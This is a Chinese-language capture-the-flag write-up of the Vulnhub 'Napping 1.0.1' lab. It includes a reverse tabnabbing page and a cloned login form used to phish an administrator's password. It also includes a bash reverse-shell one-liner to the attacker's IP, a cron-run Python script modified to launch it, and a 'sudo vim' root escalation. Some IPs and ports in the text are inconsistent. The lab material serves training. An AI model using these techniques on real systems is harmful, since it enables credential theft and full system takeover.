Vulnhub靶场--NAPPING: 1.0.1

环境配置

靶机链接
攻击者主机IP:192.168.47.145
目标主机IP:192.168.47.13

信息搜集

扫描目标主机,发现目标主机开放了2280端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sT -A -p- 172.18.53.13
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-09 08:48 EST
Nmap scan report for 172.18.53.1
Host is up (0.00068s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA)
|   256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA)
|_  256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.68 ms 172.18.53.1

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.27 seconds

Web漏洞挖掘

访问目标主机的80端口,发现是一个登录注册页面

此处考虑sql注入,万能密码,弱口令,未成功
接着考虑爆破目录,看看是否存在其他的路径

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://172.18.53.13/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.18.53.1/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,php,html,js,txt.bak,git,git.bak,txt,php.bak,html.bak,json,zip.bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 276]
/.html.bak            (Status: 403) [Size: 276]
/.html                (Status: 403) [Size: 276]
/register.php         (Status: 200) [Size: 1566]
/index.php            (Status: 200) [Size: 1219]
/welcome.php          (Status: 302) [Size: 0] [--> index.php]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/config.php           (Status: 200) [Size: 0]
/.html.bak            (Status: 403) [Size: 276]
/.php                 (Status: 403) [Size: 276]
/.html                (Status: 403) [Size: 276]
/server-status        (Status: 403) [Size: 276]
Progress: 2867280 / 2867293 (100.00%)
===============================================================
Finished
===============================================================

访问config.php,发现是空白页,猜测可能需要传参,ffuf之后没有成功

那么回到前面的页面,先注册一个账号再登录

登录之后,是一个博客推广网站,可以免费提交博客链接用于推广,所有链接都会被管理员用户审查。
在我们提交链接之后,可以通过点击Here查看我们提交的链接。

搜索查看wp之后,发现这里存在Tabnabbing漏洞。
通过F12修改Here对应的链接,看看是否可以i跳转。如果输入什么网站,就跳转到什么网站,那么会存在Tabnabbing漏洞。

Tabnabbing攻击:
使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面A页面,进而无征兆把访问正常网站A页面修改为钓鱼网站C页面。
两个可以利用点:
1、使用a标签,并且target=_blank,没有使用rel="noopener/noreferrer"属性
2、使用window.open


点击之后,确实发生了跳转

接着,我们创建两个页面,一个是恶意的页面B,另一个是伪造的登录页面C
恶意页面B.html

<!DOCTYPE html>
<html>
  <body>
    <script>
      if(window.opener) mainframe.location.replace=('http://172.18.53.145:8888/C.html');
      if(window.opener != window) mainframe.location.replace=('http://172.18.53.145:8888/C.html');
    </script>
  </body>
</html>

代码解释:

代码解释:
1. window.opener 属性表示打开当前窗口的窗口对象,如果当前窗口不是由另一个窗口打开的,则它的值为null。
2. if(window.opener) 这行代码检查window.opener是否存在,如果存在,表示当前窗口是被另一个窗口打开的,即在iframe中。
3. mainframe 表示主窗口,也就是打开当前窗口的窗口。
4. location.replace 能将主窗口的地址栏改变到一个新的地址,相当于重定向主窗口。
5. 将主窗口的location改成'http://172.18.53.145:8888/login.html',意味着重定向主窗口到这个新的登录页面。

伪造的登陆页面C.html,这里直接拷贝了正常登录页面的源码:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <style>
        body{ font: 14px sans-serif; }
        .wrapper{ width: 360px; padding: 20px; }
    </style>
</head>
<body>
    <div class="wrapper">
        <h2>Login</h2>
        <p>Please fill in your credentials to login.</p>

        
        <form action="/index.php" method="post">
            <div class="form-group">
                <label>Username</label>
                <input type="text" name="username" class="form-control " value="">
                <span class="invalid-feedback"></span>
            </div>    
            <div class="form-group">
                <label>Password</label>
                <input type="password" name="password" class="form-control ">
                <span class="invalid-feedback"></span>
            </div>
            <div class="form-group">
                <input type="submit" class="btn btn-primary" value="Login">
            </div>
            <p>Don't have an account? <a href="register.php">Sign up now</a>.</p>
        </form>
    </div>
</body>
</html>

在攻击者机器上使用python起一个http服务,并监听本地8888端口

┌──(kali㉿kali)-[~/tools/download]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
┌──(kali㉿kali)-[~]
└─$ nc -lvp 8888           
listening on [any] 8888 ...

然后将B页面当作需要推广的博客链接提交,这样就相当于将恶意链接嵌入了正常的页面,当管理员用户点击该链接进行审查时,原页面就会跳转到我们伪造的登录页面,当管理员用户登录时,攻击者就可以拿到管理员用户的账号密码。

┌──(kali㉿kali)-[~]
└─$ nc -lvp 8888           
listening on [any] 8888 ...
172.18.53.13: inverse host lookup failed: Unknown host
connect to [172.18.53.145] from (UNKNOWN) [172.18.53.13] 49584
POST /login.html HTTP/1.1
Host: 172.18.53.145:8888
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 45
Content-Type: application/x-www-form-urlencoded

username=daniel&password=C%40ughtm3napping123 

这样我们就拿到了账号:daniel,密码:C@ughtm3napping123,想到端口扫描时,目标主机还开放了22端口,那么就使用这个账号密码进行SSH登录。

┌──(kali㉿kali)-[~]
└─$ ssh daniel@172.18.53.13            
The authenticity of host '172.18.53.13 (172.18.53.13)' can't be established.
ED25519 key fingerprint is SHA256:81h22zyEZ6ztpKfLu65kzPnsnUUotkuioRYPno8fpN8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.18.53.13' (ED25519) to the list of known hosts.
daniel@172.18.53.13's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-89-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Nov 10 06:49:58 UTC 2023

  System load:             0.02
  Usage of /:              44.0% of 18.57GB
  Memory usage:            10%
  Swap usage:              0%
  Processes:               149
  Users logged in:         0
  IPv4 address for enp0s3: 172.18.53.13
  IPv6 address for enp0s3: 2001:250:6406:2053:a00:27ff:fe49:ee4d

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

33 updates can be applied immediately.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Oct 12 00:51:35 2021 from 10.0.2.15
daniel@napping:~$ 

提权

登录之后收集目标主机的基本信息
(1)有当前用户的密码,可以先查看一下当前用户的权限,发现当前用户没有权限

daniel@napping:~$ sudo -l
[sudo] password for daniel: 
Sorry, user daniel may not run sudo on napping.

2)看看有没有可疑的用户或者用户组
查看当前用户及其所属组,发现当前用户有一个所在组administrators

daniel@napping:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel),1002(administrators)

查看/etc/passwd文件,看看有没有特殊的用户,发现adrian用户和daniel用户,通过ls /home也可以查看

daniel@napping:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
adrian:x:1000:1000:adrian:/home/adrian:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
daniel:x:1001:1001::/home/daniel:/bin/bash

(3)查看内核版本以及网络情况

daniel@napping:~$ uname -a
Linux napping 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:50:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
daniel@napping:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:49:ee:4d brd ff:ff:ff:ff:ff:ff
    inet 172.18.53.13/24 brd 172.18.53.255 scope global dynamic enp0s3
       valid_lft 4184sec preferred_lft 4184sec
    inet6 2001:250:6406:2053:a00:27ff:fe49:ee4d/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 2591998sec preferred_lft 604798sec
    inet6 fe80::a00:27ff:fe49:ee4d/64 scope link 
       valid_lft forever preferred_lft forever

(4)查看看网站根目录是否存在数据库账号密码等敏感信息
在config.php页面中发现一个数据库的账号密码

daniel@napping:~$ cd /var/www/html/
daniel@napping:/var/www/html$ ls -liah
total 44K
792043 drwxr-xr-x 2 root root 4.0K Oct 12  2021 .
792042 drwxr-xr-x 3 root root 4.0K Oct 11  2021 ..
792826 -rw-r--r-- 1 root root  486 Oct 11  2021 config.php
792827 -rw-r--r-- 1 root root 4.7K Oct 11  2021 index.php
792828 -rw-r--r-- 1 root root  223 Oct 11  2021 logout.php
792830 -rw-r--r-- 1 root root 5.2K Oct 11  2021 register.php
792829 -rw-r--r-- 1 root root 3.9K Oct 11  2021 reset-password.php
794398 -rw-r--r-- 1 root root 6.8K Oct 12  2021 welcome.php
daniel@napping:/var/www/html$ cat config.php 
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'adrian');
define('DB_PASSWORD', 'P@sswr0d456');
define('DB_NAME', 'website');
 
/* Attempt to connect to MySQL database */
$mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
 
// Check connection
if($mysqli === false){
    die("ERROR: Could not connect. " . $mysqli->connect_error);
}
?>

(5)查看用户家目录下有没有可疑的文件

daniel@napping:~$ ls /home/
adrian  daniel
daniel@napping:~$ ls -liah /home/adrian/
total 32K
791504 drwxr-xr-x 3 adrian adrian         4.0K Nov  9 13:48 .
262145 drwxr-xr-x 4 root   root           4.0K Oct 12  2021 ..
794373 lrwxrwxrwx 1 adrian adrian            9 Oct 12  2021 .bash_history -> /dev/null
791506 -rw-r--r-- 1 adrian adrian            0 Feb 25  2020 .bash_logout
791507 -rw-r--r-- 1 adrian adrian            0 Feb 25  2020 .bashrc
791524 drwx------ 2 adrian adrian         4.0K Oct 11  2021 .cache
794363 lrwxrwxrwx 1 adrian adrian            9 Oct 12  2021 .mysql_history -> /dev/null
791505 -rw-r--r-- 1 adrian adrian            0 Feb 25  2020 .profile
794359 -rw-rw-r-- 1 adrian adrian           75 Oct 11  2021 .selected_editor
791526 -rw-r--r-- 1 adrian adrian            0 Oct 11  2021 .sudo_as_admin_successful
792736 -rw------- 1 adrian adrian            0 Oct 30  2021 .viminfo
792740 -rw-rw-r-- 1 adrian administrators  481 Oct 30  2021 query.py
792383 -rw-rw-r-- 1 adrian adrian         5.9K Nov 10 07:08 site_status.txt
794392 -rw------- 1 adrian adrian           22 Oct 12  2021 user.txt
daniel@napping:~$ ls -liah /home/daniel/
total 24K
792831 drwxr-xr-x 3 daniel daniel 4.0K Oct 12  2021 .
262145 drwxr-xr-x 4 root   root   4.0K Oct 12  2021 ..
794391 lrwxrwxrwx 1 daniel daniel    9 Oct 12  2021 .bash_history -> /dev/null
794358 -rw-r--r-- 1 daniel daniel  220 Feb 25  2020 .bash_logout
794360 -rw-r--r-- 1 daniel daniel 3.7K Feb 25  2020 .bashrc
794361 drwx------ 2 daniel daniel 4.0K Oct 12  2021 .cache
794351 -rw-r--r-- 1 daniel daniel  807 Feb 25  2020 .profile
792825 -rw------- 1 daniel daniel    0 Oct 12  2021 .viminfo

daniel用户的家目录下,没有什么可疑文件,
adrian用户家目录下的query.py文件,对于用户组administrators有读写权限,当前登录的用户也在这个用户组,那么这个文件可以考虑利用。先查看这个文件的内容

daniel@napping:~$ cat /home/adrian/query.py 
from datetime import datetime
import requests

now = datetime.now()

r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()

该文件首先访问本机的网站,如果访问成功则向site_status.txt文件写入Site is Up和检查时间,如果访问失败,写入CHeck Out Site和检查时间
查看site_status.txt文件,发现该文件从网站运行开始,每两分钟记录一次网站的运行状态

daniel@napping:/home/adrian$ cat site_status.txt 
Site is Up: 09/11/2023 13:48:03
Site is Up: 09/11/2023 13:50:01
Site is Up: 09/11/2023 13:52:02
Site is Up: 09/11/2023 13:54:01
Site is Up: 09/11/2023 13:56:01
Site is Up: 09/11/2023 13:58:01
Site is Up: 09/11/2023 14:00:02
Site is Up: 09/11/2023 14:02:01
Site is Up: 09/11/2023 14:04:02
Site is Up: 09/11/2023 14:06:02
Site is Up: 09/11/2023 14:08:02
Site is Up: 09/11/2023 14:10:01
Site is Up: 09/11/2023 14:12:01
Site is Up: 09/11/2023 14:14:01
Site is Up: 09/11/2023 14:16:02

猜测有定时任务,每两分钟运行一次该脚本。
因为当前用户所在所在用户组有权限修改该脚本,所以考虑直接修改该脚本反弹shell,拿到adrian用户权限。
/tmp目录下创建shell.sh

daniel@napping:/tmp$ cat shell.sh 
#! /bin/bash
bash -c 'bash -i >& /dev/tcp/172.18.53.145/4444 0>&1'

修改query.py文件

daniel@napping:/home/adrian$ cat query.py 
from datetime import datetime
import requests
import os

os.system('/usr/bin/bash /tmp/shell.sh')

now = datetime.now()

r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()

等待两分钟,shell反弹成功

┌──(kali㉿kali)-[~/tools/download]
└─$ nc -lvp 4444           
listening on [any] 4444 ...
172.18.53.13: inverse host lookup failed: Unknown host
connect to [172.18.53.145] from (UNKNOWN) [172.18.53.13] 35184
bash: cannot set terminal process group (3941): Inappropriate ioctl for device
bash: no job control in this shell
adrian@napping:~$ 

查看当前用户的权限,发现当前用户可以在不需要密码的情况下使用vim

adrian@napping:~$ sudo -l                                                                                         
sudo -l                                                                                                           
Matching Defaults entries for adrian on napping:                                                                  
    env_reset, mail_badpass,                                                                                      
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin                      
                                                                                                                  
User adrian may run the following commands on napping:                                                            
    (root) NOPASSWD: /usr/bin/vim 

于是,利用vim提权

sudo vim -c ':!/bin/sh' 

提权成功

:!/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
posted @ 2023-11-15 22:15  顾北清  阅读(215)  评论(1编辑  收藏  举报